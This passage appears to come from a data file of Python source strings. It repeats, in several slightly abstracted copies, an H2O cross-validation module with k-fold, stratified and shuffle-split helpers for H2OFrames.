fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\ntry:\n from h2o import H2OEstimator\nexcept ImportError:\n from h2o.estimators.estimator_base import H2OEstimator\ntry:\n from sklearn.model_selection import KFold\n SK18 = True\nexcept ImportError:\n from sklearn.cross_validation import KFold\n SK18 = False\n__all__ = ['check_cv', 'h2o_train_test_split', 'H2OKFold',\n 'H2OShuffleSplit', 'H2OStratifiedKFold', 'H2OStratifiedShuffleSplit']\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\nh2o_train_test_split.__test__ = False\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be None')\n if test_size is not None:\n if np.asarray(test_size).dtype.kind == 'f':\n if test_size >= 1.0:\n raise ValueError(\n 'test_size=%f should be smaller than 1.0 or be an integer'\n % test_size)\n elif np.asarray(test_size).dtype.kind != 'i':\n raise ValueError('Invalid value for test_size: %r' % test_size)\n if train_size is not None:\n if np.asarray(train_size).dtype.kind == 'f':\n if train_size >= 1.0:\n raise ValueError(\n 'train_size=%f should be smaller than 1.0 or be an integer'\n % test_size)\n elif np.asarray(test_size\n ).dtype.kind == 'f' and train_size + test_size > 1.0:\n raise ValueError(\n 'The sum of test_size and train_size = %fshould be smaller than 1.0. Reduce test_size and/or train_size.'\n % (train_size + test_size))\n elif np.asarray(train_size).dtype.kind != 'i':\n raise ValueError('Invalid value for train_size: %r' % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n if test_size is not None and np.asarray(test_size\n ).dtype.kind == 'i' and test_size >= n_samples:\n raise ValueError(\n 'test_size=%d should be smaller than the number of samples %d' %\n (test_size, n_samples))\n if train_size is not None and np.asarray(train_size\n ).dtype.kind == 'i' and train_size >= n_samples:\n raise ValueError(\n 'train_size=%d should be smaller than the number of samples %d' %\n (train_size, n_samples))\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n if test_size is None:\n n_test = n_samples - n_train\n if n_train + n_test > n_samples:\n raise ValueError(\n 'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'\n % (n_train + n_test, n_samples))\n return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\ntry:\n from h2o import H2OEstimator\nexcept ImportError:\n from h2o.estimators.estimator_base import H2OEstimator\ntry:\n from sklearn.model_selection import KFold\n SK18 = True\nexcept ImportError:\n from sklearn.cross_validation import KFold\n SK18 = False\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\ndef _validate_shuffle_split_init(test_size, train_size):\n \"\"\"Validation helper to check the test_size and train_size at init\"\"\"\n if test_size is None and train_size is None:\n raise ValueError('test_size and train_size can not both be None')\n if test_size is not None:\n if np.asarray(test_size).dtype.kind == 'f':\n if test_size >= 1.0:\n raise ValueError(\n 'test_size=%f should be smaller than 1.0 or be an integer'\n % test_size)\n elif np.asarray(test_size).dtype.kind != 'i':\n raise ValueError('Invalid value for test_size: %r' % test_size)\n if train_size is not None:\n if np.asarray(train_size).dtype.kind == 'f':\n if train_size >= 1.0:\n raise ValueError(\n 'train_size=%f should be smaller than 1.0 or be an integer'\n % test_size)\n elif np.asarray(test_size\n ).dtype.kind == 'f' and train_size + test_size > 1.0:\n raise ValueError(\n 'The sum of test_size and train_size = %fshould be smaller than 1.0. Reduce test_size and/or train_size.'\n % (train_size + test_size))\n elif np.asarray(train_size).dtype.kind != 'i':\n raise ValueError('Invalid value for train_size: %r' % train_size)\n\n\ndef _validate_shuffle_split(n_samples, test_size, train_size):\n if test_size is not None and np.asarray(test_size\n ).dtype.kind == 'i' and test_size >= n_samples:\n raise ValueError(\n 'test_size=%d should be smaller than the number of samples %d' %\n (test_size, n_samples))\n if train_size is not None and np.asarray(train_size\n ).dtype.kind == 'i' and train_size >= n_samples:\n raise ValueError(\n 'train_size=%d should be smaller than the number of samples %d' %\n (train_size, n_samples))\n if np.asarray(test_size).dtype.kind == 'f':\n n_test = ceil(test_size * n_samples)\n elif np.asarray(test_size).dtype.kind == 'i':\n n_test = float(test_size)\n if train_size is None:\n n_train = n_samples - n_test\n elif np.asarray(train_size).dtype.kind == 'f':\n n_train = floor(train_size * n_samples)\n else:\n n_train = float(train_size)\n if test_size is None:\n n_test = n_samples - n_train\n if n_train + n_test > n_samples:\n raise ValueError(\n 'The sum of train_size and test_size=%d, should be smaller than the number of samples %d. Reduce test_size and/or train_size.'\n % (n_train + n_test, n_samples))\n return int(n_train), int(n_test)\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n 